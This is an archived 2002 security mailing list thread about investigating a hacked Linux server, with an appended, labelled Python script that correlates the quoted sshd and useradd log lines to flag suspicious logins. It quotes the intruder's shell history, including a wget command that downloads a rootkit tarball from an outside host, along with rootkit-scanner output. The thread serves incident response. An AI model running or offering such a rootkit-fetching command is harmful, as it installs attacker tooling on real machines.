From: Alvin Oga (alvin.sec_at_Mail.Linux-Consulting.com)
Date: Wed Sep 11 2002 - 23:38:26 CDT
hi ya ver
On Wed, 11 Sep 2002, Ver Allan Sumabat wrote:
> we used linux 2.4.7-10. we only opened ports 21 (ftp),
> 22 (ssh), and 443 (https).
>
> 21 - wu-ftpd-2.6.1-20
> 22 - openssh-3.1
> 443 - tomcat-3.2.4
what does nmap say are also open ports to the outside
and to the inside of your corp lan ??
> 1. this is the content of /home/war's .bash_history:
>
> wget
> wget http://mrunix.free.fr/roy/w00tkit.tgz
> logout
game over... they are already in your server ...
- they probably got in thru wu-ftpd and/or openssh
( check the respective websites for the current
( versions you should have been running
- you should NOT have been running 2.4.7-10 kernels...
you should always compile your own kernel
and apply your own kernel hardening apps
they were trying to get more rootkits installed ( wootkit )
> 2. he was trying to send a mail to himself regarding
> the system's resources:
>
> The original message was received at Thu, 5 Sep 2002
> 22:21:37 +0800
> from root@localhost
>
> ----- The following addresses had permanent fatal
> errors -----
> roi_blabla@walla.co.il
> (reason: 501 5.1.8 Sender domain must exist)
seems really really odd that the [h/cr]acker would
send themselves an email to a domain that does not exist
or to reject it... must be another hacked box they
are playing with ??
- more server hardening/tightening stuff
http://www.Linux-Sec.net
c ya
alvin
>
> ----- Transcript of session follows -----
> ... while talking to rmail.walla.co.il.:
> >>> MAIL From:<root@srv1.iconnect.com.ph> SIZE=2283
> <<< 501 5.1.8 Sender domain must exist
> 501 5.6.0 Data format error
>
> 3. walla.co.il is in israel
>
> 4. tracing 212.179.207.211 gives israel also.
>
> i have moved the files to another machine and
> reinstalled the server 'cause we need to put it up and
> running asap. do u think the exploit was done thru
> ftp? can u help me replicate it? i was looking for
> procedures or scripts in ssh/ftp exploits so that i
> can try to attack our server but i can not find any.
>
> --- Loki <loki@fatelabs.com> wrote:
> > What version of SSHD were you running, check
> > commonly exploited
> > services.
> >
> > 1. SSHD (crc32)
> > 2. FTPD
> > 3. Apache (chunking)
> >
> > Get back to us with the versions you were running of
> > SSH, FTP, and
> > Apache and we can help you out. How hardened was the
> > OS? Did you turn
> > off all RPC services, etc. We need more info.
> >
> > Eric/Loki
> > Internet Warfare and Intelligence
> > Fate Research Labs
> > www.fatelabs.com
> >
> > -----Original Message-----
> > From: Ver Allan Sumabat [mailto:ver_allan@yahoo.com]
> >
> > Sent: Tuesday, September 10, 2002 6:08 AM
> > To: incidents@securityfocus.com
> > Subject: possible ssh hack
> >
> >
> > Hi,
> >
> > We have just recently been hacked. I have no idea
> > how
> > he came in. Here are my preliminary investigations:
> >
> > 1. He was able to add a user without logging in.
> >
> > **Unmatched Entries**
> > Sep 5 10:39:33 srv1 sshd[20514]: Could not reverse
> > map address 10.13.41.4.
> > Sep 5 10:39:35 srv1 sshd[20514]: Accepted password
> > for root from 10.13.41.4
> > port 4207
> > Sep 5 17:30:36 srv1 sshd[23299]: Could not reverse
> > map address 10.13.41.4.
> > Sep 5 17:30:41 srv1 sshd[23299]: Accepted password
> > for root from 10.13.41.4
> > port 2491
> > Sep 5 22:16:59 srv1 useradd[23532]: new group:
> > name=war, gid=502
> > Sep 5 22:16:59 srv1 useradd[23532]: new user:
> > name=war, uid=502, gid=502,
> > home=/home/war, shell=/bin/bash
> > Sep 5 22:17:31 srv1 sshd[23534]: Accepted password
> > for war from
> > 212.179.207.211 port 2746
> > Sep 5 22:19:17 srv1 sshd[23580]: fatal: Read from
> > socket failed: Connection
> > reset by peer
> > Sep 5 22:21:48 srv1 sshd[928]: Received SIGHUP;
> > restarting.
> >
> >
> > 2. He installed a tarball w00tkit.tgz in /home/war
> >
> > 3. After running chkrootkit, the significant lines
> > are:
> >
> > ...
> > Checking `ifconfig'... INFECTED
> > ...
> > Searching for Showtee... Warning: Possible Showtee
> > Rootkit installed
> > ...
> > Checking `lkm'... You have 1 process hidden for
> > ps
> > command
> > Warning: Possible LKM Trojan installed
> >
> > 4. ssh won't run anymore
> >
> > Can anyone help me on how the intrusion was done?
> >
> > Thanks.
> >
> > Regards,
> >
> > Allan
> >
> >
> >
> > ----------------------------------------------------------------------------
> > This list is provided by the SecurityFocus ARIS
> > analyzer service. For
> > more information on this free incident handling,
> > management
> > and tracking system please see:
> > http://aris.securityfocus.com
> >
>
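Added here as an example and not part of this thread: a small Python triage script run over the sshd and useradd lines Allan quoted in his original message. The log text is a constructed sample (those same lines re-joined onto single syslog lines, year omitted as syslog does). It flags the three things a responder would want pulled out of that excerpt: password logins as root, a new account followed within minutes by its first login from a non-private address, and an sshd restart shortly after an external login. The syslog layout regex, the ten-minute correlation window and all function names are assumptions of this example, not anything the list members posted.

```python
import re
from datetime import datetime, timedelta
from ipaddress import ip_address

# Constructed sample: the sshd/useradd lines quoted in the thread, re-joined
# onto single syslog lines (year omitted, as syslog does).
SAMPLE_LOG = """\
Sep 5 10:39:33 srv1 sshd[20514]: Could not reverse map address 10.13.41.4.
Sep 5 10:39:35 srv1 sshd[20514]: Accepted password for root from 10.13.41.4 port 4207
Sep 5 17:30:36 srv1 sshd[23299]: Could not reverse map address 10.13.41.4.
Sep 5 17:30:41 srv1 sshd[23299]: Accepted password for root from 10.13.41.4 port 2491
Sep 5 22:16:59 srv1 useradd[23532]: new group: name=war, gid=502
Sep 5 22:16:59 srv1 useradd[23532]: new user: name=war, uid=502, gid=502, home=/home/war, shell=/bin/bash
Sep 5 22:17:31 srv1 sshd[23534]: Accepted password for war from 212.179.207.211 port 2746
Sep 5 22:19:17 srv1 sshd[23580]: fatal: Read from socket failed: Connection reset by peer
Sep 5 22:21:48 srv1 sshd[928]: Received SIGHUP; restarting.
"""

# Assumed classic syslog layout: "Mon D HH:MM:SS host prog[pid]: message"
LINE_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) "
    r"(?P<host>\S+) (?P<prog>[\w.-]+)\[(?P<pid>\d+)\]: (?P<msg>.*)$"
)
ACCEPT_RE = re.compile(r"Accepted (?P<method>\S+) for (?P<user>\S+) from (?P<ip>\S+) port (?P<port>\d+)")
NEWUSER_RE = re.compile(r"new user: name=(?P<user>[^,]+), uid=(?P<uid>\d+)")


def parse_events(text):
    """Turn raw syslog text into a list of typed event dicts (unparseable lines are skipped)."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{m['mon']} {m['day']} {m['time']}", "%b %d %H:%M:%S")
        ev = {"ts": ts, "host": m["host"], "prog": m["prog"], "kind": "other"}
        if m["prog"] == "sshd":
            a = ACCEPT_RE.search(m["msg"])
            if a:
                ev.update(kind="login", user=a["user"], method=a["method"],
                          ip=a["ip"], port=int(a["port"]))
            elif "Received SIGHUP; restarting" in m["msg"]:
                ev["kind"] = "sshd_restart"
        elif m["prog"] == "useradd":
            n = NEWUSER_RE.search(m["msg"])
            if n:
                ev.update(kind="new_user", user=n["user"], uid=int(n["uid"]))
        events.append(ev)
    return events


def analyze(events, window=timedelta(minutes=10)):
    """Correlate events and return human-readable findings, oldest first."""
    findings = []
    created = {}              # username -> time useradd logged the account
    last_external_login = None
    for ev in sorted(events, key=lambda e: e["ts"]):
        when = f"{ev['ts']:%b %d %H:%M:%S}"
        if ev["kind"] == "new_user":
            created[ev["user"]] = ev["ts"]
        elif ev["kind"] == "login":
            external = not ip_address(ev["ip"]).is_private
            if ev["user"] == "root" and ev["method"] == "password":
                findings.append(f"{when}: password login as root from {ev['ip']} "
                                "(sshd should not accept passwords for root)")
            if ev["user"] in created and ev["ts"] - created[ev["user"]] <= window:
                secs = int((ev["ts"] - created[ev["user"]]).total_seconds())
                where = "non-private" if external else "private"
                findings.append(f"{when}: account {ev['user']} created {secs}s before its first "
                                f"login from {ev['ip']} ({where} address)")
            if external:
                last_external_login = ev["ts"]
        elif ev["kind"] == "sshd_restart" and last_external_login is not None:
            gap = ev["ts"] - last_external_login
            if gap <= window:
                findings.append(f"{when}: sshd restarted {int(gap.total_seconds())}s after an external "
                                "login (verify the sshd binary and config against a known-good copy)")
    return findings


def report(text=SAMPLE_LOG):
    """Parse and analyze in one step; returns the list of findings."""
    return analyze(parse_events(text))


if __name__ == "__main__":
    for finding in report():
        print(finding)
```

Run against the sample it yields four findings: the two root password logins from 10.13.41.4, the `war` account logging in 32 seconds after useradd created it from a non-private address, and sshd restarting 257 seconds after that login. The point of the correlation, rather than grepping single lines, is that the useradd-then-login pair and the post-login SIGHUP are the parts of the excerpt that speak to how the box was used, not only that it was entered.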